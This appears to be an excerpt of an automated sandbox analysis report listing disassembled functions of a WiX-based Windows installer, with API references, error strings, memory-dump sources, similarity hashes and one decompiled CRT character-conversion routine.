                                                                                                                                                                  • Instruction Fuzzy Hash: 0AF04F323007019FD7205B6ADD08B67B7E9EF84352B05C53FE556D6950DB79D8008FA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00418078, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post shutdown message., xrefs: 004180C5
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 004180BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                  • API String ID: 2609174426-188808143
                                                                                                                                                                  • Opcode ID: f67decc1afaf30a7fa4bd79b000b1fd86babd5c9fd7074adb13fe4ab0eb63c80
                                                                                                                                                                  • Instruction ID: 6974d27b8ec263fb50b61d68c7ac6359c555099927ee308fa9c56ddd917b615c
                                                                                                                                                                  • Opcode Fuzzy Hash: f67decc1afaf30a7fa4bd79b000b1fd86babd5c9fd7074adb13fe4ab0eb63c80
                                                                                                                                                                  • Instruction Fuzzy Hash: 36F0A7327413346AE7206AA96C05F9B7AC8EF08761F01012AFE08E6191DA15881086EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004179C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post apply message., xrefs: 00417A13
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417A09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                  • API String ID: 2609174426-1304321051
                                                                                                                                                                  • Opcode ID: a850b535cec47bc64203e6958db20dd5afd86345f667754ed788f0e9ed29b0b8
                                                                                                                                                                  • Instruction ID: b1dbac710d46c493b125d60e76e6c8e46c21072c018540de6c350c1696984deb
                                                                                                                                                                  • Opcode Fuzzy Hash: a850b535cec47bc64203e6958db20dd5afd86345f667754ed788f0e9ed29b0b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 3BF037327453306AE6716A6A6C09F9B7BD8EF087A1F014126FE09EA191D765981086E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042319F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(0000C3E8,00000000,?,004240AD,00401F17,00000000,?,00418F3C,00401F17,004021A7,?,00411691,?,?,00401E27,?), ref: 004231A9
                                                                                                                                                                  • GetLastError.KERNEL32(?,004240AD,00401F17,00000000,?,00418F3C,00401F17,004021A7,?,00411691,?,?,00401E27,?,00401E67,WixBundleElevated), ref: 004231B3
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 004231D7
                                                                                                                                                                  • Failed to set begin operation event., xrefs: 004231E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                  • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3848097054-4159625223
                                                                                                                                                                  • Opcode ID: 02d039ee59bd8e9b8e8667d5d879c60410f6282fada5daeec5affbb7d5f5f452
                                                                                                                                                                  • Instruction ID: 00c605dced994afdf200925cc92b988962f979e7dc7ad6c4381ff11471432a5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 02d039ee59bd8e9b8e8667d5d879c60410f6282fada5daeec5affbb7d5f5f452
                                                                                                                                                                  • Instruction Fuzzy Hash: 36F0A733B417306AA3116A667C0679B76D8DF29792F110227FD04F7150D65D9D1046ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417A57, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post detect message., xrefs: 00417AA2
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417A98
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                  • API String ID: 2609174426-598219917
                                                                                                                                                                  • Opcode ID: b2a2b565154801f97cb44c1a16f6c73648ae1cb6244f8d10798ebff23fdbef5a
                                                                                                                                                                  • Instruction ID: fd1e014e0a57842a570791d6a2e7ab4b18a2cbb01ae694b1ea343542ead387ba
                                                                                                                                                                  • Opcode Fuzzy Hash: b2a2b565154801f97cb44c1a16f6c73648ae1cb6244f8d10798ebff23fdbef5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 94F06C367453306AF274656A6C09F9B7AD8DF18791F11012BFE09E7191DA15DC0086EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042BEDC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0042BEEA
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • _free.LIBCMT ref: 0042BF1B
                                                                                                                                                                  • _free.LIBCMT ref: 0042BF24
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$CriticalEnterSection__lock__mtinitlocknum
                                                                                                                                                                  • String ID: P|E
                                                                                                                                                                  • API String ID: 3990512260-381776967
                                                                                                                                                                  • Opcode ID: 77ea734f9388a56fdf3f6304a65be340a0a9ff3da52e724de590290f559021ce
                                                                                                                                                                  • Instruction ID: 062428d57bbe355dae9bdc0b9fb71f97419c6b0b8347d016170d550cc08e0999
                                                                                                                                                                  • Opcode Fuzzy Hash: 77ea734f9388a56fdf3f6304a65be340a0a9ff3da52e724de590290f559021ce
                                                                                                                                                                  • Instruction Fuzzy Hash: B6F0AF347017119FD714AB31FA0272A77A0EB00319FA5815FA9049A681DB3DD9408A8C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417F6C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post plan message., xrefs: 00417FB9
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417FAF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                                  • API String ID: 2609174426-2952114608
                                                                                                                                                                  • Opcode ID: 1fdae1579b291a6ba596863b4ab4f8c6cd485f5c3fe75489476fa695a7cee8c6
                                                                                                                                                                  • Instruction ID: 63d362263e91f831e120217c9c5f97cb58c95ce9b1ca3661922df36dc6452703
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fdae1579b291a6ba596863b4ab4f8c6cd485f5c3fe75489476fa695a7cee8c6
                                                                                                                                                                  • Instruction Fuzzy Hash: 36F037367453306AE6706A6A6C09F9B7AD8DF087A1F014126FE0CEA191D625981185E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042963E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0042967B,00000000,?,0042BC0E,000000FF,0000001E,?,00000000,00000000,?,0042C16B), ref: 0042964D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042965F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 1646373207-1276376045
                                                                                                                                                                  • Opcode ID: 5bec187cac06cf98866fcd7c34b64a5867ac40db3e9a7fb99f2a455d63dc8e42
                                                                                                                                                                  • Instruction ID: 20e8291601f3ebb9c9630c63f960f62aaa1a0a2f38664370930e7b30e85569a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bec187cac06cf98866fcd7c34b64a5867ac40db3e9a7fb99f2a455d63dc8e42
                                                                                                                                                                  • Instruction Fuzzy Hash: 74D01230344218B6EB015B92DD05F5E76ADFB00741F100021B501F0190EB65DE10969C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100181BA, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D555( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F780(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                  0x100181c2
                                                                                                                                                                  0x100181c9
                                                                                                                                                                  0x100181de
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d0
                                                                                                                                                                  0x100181d2
                                                                                                                                                                  0x100181ea
                                                                                                                                                                  0x100181ef
                                                                                                                                                                  0x100181f2
                                                                                                                                                                  0x100181f5
                                                                                                                                                                  0x1001821e
                                                                                                                                                                  0x10018223
                                                                                                                                                                  0x10018227
                                                                                                                                                                  0x100182a8
                                                                                                                                                                  0x100182ba
                                                                                                                                                                  0x100182c3
                                                                                                                                                                  0x100182c5
                                                                                                                                                                  0x10018205
                                                                                                                                                                  0x10018205
                                                                                                                                                                  0x10018208
                                                                                                                                                                  0x1001820a
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10018213
                                                                                                                                                                  0x10018287
                                                                                                                                                                  0x10018287
                                                                                                                                                                  0x1001828c
                                                                                                                                                                  0x10018292
                                                                                                                                                                  0x10018295
                                                                                                                                                                  0x10018297
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001829e
                                                                                                                                                                  0x10018229
                                                                                                                                                                  0x1001822c
                                                                                                                                                                  0x1001822c
                                                                                                                                                                  0x10018232
                                                                                                                                                                  0x10018235
                                                                                                                                                                  0x1001825c
                                                                                                                                                                  0x1001825f
                                                                                                                                                                  0x1001825f
                                                                                                                                                                  0x10018265
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10018267
                                                                                                                                                                  0x1001826a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001826c
                                                                                                                                                                  0x1001826c
                                                                                                                                                                  0x1001826f
                                                                                                                                                                  0x1001826f
                                                                                                                                                                  0x10018275
                                                                                                                                                                  0x100181e3
                                                                                                                                                                  0x100181e3
                                                                                                                                                                  0x1001827e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001827e
                                                                                                                                                                  0x10018237
                                                                                                                                                                  0x1001823a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001823e
                                                                                                                                                                  0x1001824c
                                                                                                                                                                  0x1001824f
                                                                                                                                                                  0x10018255
                                                                                                                                                                  0x10018257
                                                                                                                                                                  0x1001825a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001825a
                                                                                                                                                                  0x100181f7
                                                                                                                                                                  0x100181fa
                                                                                                                                                                  0x100181fc
                                                                                                                                                                  0x10018202
                                                                                                                                                                  0x10018202
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d4
                                                                                                                                                                  0x100181d4
                                                                                                                                                                  0x100181d9
                                                                                                                                                                  0x100181db
                                                                                                                                                                  0x100181db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d9
                                                                                                                                                                  0x100181d2

                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 1001821E
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  • Opcode ID: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
                                                                                                                                                                  • Instruction ID: d5078d4910217e7b4ecb4b559098acf50bee0a5cb4f006de64edc12b54e59432
                                                                                                                                                                  • Opcode Fuzzy Hash: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
                                                                                                                                                                  • Instruction Fuzzy Hash: 6131B031A00256EFDB12CFA4CC84AAE7BF9FF01251F168569E8609F091E730DB81DB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401A7C, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,00401F56,?,?,?,?,?,?,?), ref: 00401AC6
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00401F56,?,?,?,?,?,?,?), ref: 00401ADA
                                                                                                                                                                  • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401F56,?,?,?,?), ref: 00401BB1
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401F56,?,?,?,?), ref: 00401BB8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalDeleteSection$CloseFreeHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 882612062-0
                                                                                                                                                                  • Opcode ID: 12c28ef7e8380a1c27a56e814ab8be4516b9a762337ec94498b3787e716f4031
                                                                                                                                                                  • Instruction ID: dc09aa3bb003fb873dfe6a94ffdbabb202d9f592982eedd252bb745c99848a59
                                                                                                                                                                  • Opcode Fuzzy Hash: 12c28ef7e8380a1c27a56e814ab8be4516b9a762337ec94498b3787e716f4031
                                                                                                                                                                  • Instruction Fuzzy Hash: 22312E71610B045BCA20EBB1C849F9BB3FCAF44314F40492EB29AE3191EB3CF5448B29
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004124B8, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,00401414), ref: 00412555
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to ensure cache directory to remove was backslash terminated., xrefs: 0041250F
                                                                                                                                                                  • Failed to combine id to root cache path., xrefs: 004124F9
                                                                                                                                                                  • Failed to calculate root cache path., xrefs: 004124DD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to calculate root cache path.$Failed to combine id to root cache path.$Failed to ensure cache directory to remove was backslash terminated.
                                                                                                                                                                  • API String ID: 3472027048-541824359
                                                                                                                                                                  • Opcode ID: 1c428c917e1039295e5a8157f38c6435b5bc4216eaabfecc0049209345d311bf
                                                                                                                                                                  • Instruction ID: 06912d2fc45cf1f216bbf24773e56cd1a0981c0b3fa05c7feb2e04aa384447e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c428c917e1039295e5a8157f38c6435b5bc4216eaabfecc0049209345d311bf
                                                                                                                                                                  • Instruction Fuzzy Hash: E2310472D00224FBDF125A94CD56FEE7A66DB04724F210167F800F6152D7BC8FA1969C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042F5E3, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042F617
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 0042F645
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 0042F673
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 0042F6A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  • Opcode ID: d4be3a0a953b266d4a7178989e6eb3d1a7349f6570a2062407f8d7316e13ebd1
                                                                                                                                                                  • Instruction ID: f7d573c7fa33813a0edf9a888bdff79d474357e5b64996a0c278ed434c1265a9
                                                                                                                                                                  • Opcode Fuzzy Hash: d4be3a0a953b266d4a7178989e6eb3d1a7349f6570a2062407f8d7316e13ebd1
